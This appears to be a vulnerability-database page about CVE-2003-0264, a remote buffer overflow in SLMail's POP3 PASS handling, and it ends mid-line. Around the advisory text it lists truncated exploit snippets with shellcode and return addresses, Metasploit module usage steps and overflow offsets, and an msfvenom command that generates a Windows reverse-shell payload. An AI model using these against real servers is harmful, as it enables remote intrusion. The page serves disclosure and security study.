CVE-2003-0264

Published: 27/05/2003 Updated: 24/02/2021
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 812
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple buffer overflows in SLMail 5.1.0.4420 allow remote malicious users to execute arbitrary code via (1) a long EHLO argument to slmail.exe, (2) a long XTRN argument to slmail.exe, (3) a long string to POPPASSWD, or (4) a long password to the POP3 server.

Vulnerable Product

seattle lab software slmail 5.1.0.4420

Exploits

# SLmail 5.5 POP3 PASS Buffer Overflow # Discovered by : Muts # Coded by : Muts # www.offsec.com # Pl ...
/* SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov Иван-дурак недействительный 31337 Team */ #include <string.h> #include <stdio.h> #include <winsock2.h> #include <windows.h> // [*] bind 4444 unsigned char shellcode[] = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" "\x3c\x8b\ ...
## # $Id: seattlelab_pass.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # metasploit.com/framework/ ## require 'msf/core' class ...
#include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/wait.h> #include <errno.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/ #define port 1 ...

Mailing Lists

SLMail version 5.1.0.4420 remote code execution exploit ...

Metasploit Modules

Seattle Lab Mail 5.5 POP3 Buffer Overflow

There exists an unauthenticated buffer overflow vulnerability in the POP3 server of Seattle Lab Mail 5.5 when sending a password with excessive length. Successful exploitation should not crash either the service or the server; however, after initial use the port cannot be reused for successive exploitation until the service has been restarted. Consider using a command execution payload following the bind shell to restart the service if you need to reuse the same port. The overflow appears to occur in the debugging/error reporting section of the slmail.exe executable, and there are multiple offsets that will lead to successful exploitation. This exploit uses 2606, the offset that creates the smallest overall payload. The other offset is 4654. The return address is overwritten with a "jmp esp" call from the application library SLMFC.DLL found in %SYSTEM%\system32\. This return address works against all versions of Windows and service packs. The last modification date on the library is dated 06/02/99. Assuming that the code where the overflow occurs has not changed in some time, prior versions of SLMail may also be vulnerable with this exploit. The author has not been able to acquire older versions of SLMail for testing purposes. Please let us know if you were able to get this exploit working against other SLMail versions.

msf > use exploit/windows/pop3/seattlelab_pass
msf exploit(seattlelab_pass) > show targets
    ...targets...
msf exploit(seattlelab_pass) > set TARGET <target-id>
msf exploit(seattlelab_pass) > show options
    ...show and set options...
msf exploit(seattlelab_pass) > exploit

Github Repositories

Customizable TCP fuzzing tool to test for remote buffer overflows.

fuzza: Customizable TCP fuzzing tool to test for remote buffer overflows. fuzza is able to send and receive any initial commands prior to sending the payload, as well as sending any post commands after the payload has been sent. In order to replicate and triage the buffer overflow, fuzza can be used to generate custom Python scripts for attack, badchars and finding the EIP.

Exploit CVE-2003-0264

CVE-2003-0264: Exploit CVE-2003-0264

A POC remote buffer overflow for CVE-2003-0264 - SLMail 5.5

CVE-2003-0264 - Seattle Lab Mail 5.5 POP3 Buffer Overflow. References: cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0264. Vulnerability: SLMail has no bounds checking when submitting a POP3 password. As a result, you can execute arbitrary code by submitting a long, malformed POP3 PASS to the SLMail server.

slmail-exploit: CVE-2003-0264 Remote Buffer Overflow

A buffer overflow exploit for the SLmail-5.5 pop3 service, CVE-2003-0264

pop3_SLmail-exploit: A buffer overflow exploit for the SLmail-5.5 pop3 service, CVE-2003-0264. To use it: generate shellcode with Metasploit, msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=444 -b "\x00\x0a\x0d\x20" -f python, then copy the generated decimals and replace the shellcode set in the code with the new one.

CVE-2003-0264_EXPLOIT: Buffer Overflow in Seattle Lab Mail (SLmail) 5.5 - POP3

CVE-2003-0264 - SLMail 5.5 POP3 'PASS' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.

CVE-2003-0264

Public exploits and modifications

Exploits: Public exploits modifications.
CVE-2002-0082: Apache mod_ssl < 2.8.7 OpenSSL - OpenFuckV2.c Remote Buffer Overflow. Fixes compilation errors.
CVE-2009-3103: Remote Code Execution via "SMBv2 Negotiation Vulnerability". Fixes compilation errors.
CVE-2017-0143 aka MS17-010: Remote Code Execution vulnerability in Microsoft SMBv1. Fixes compilation errors.
CVE-2003-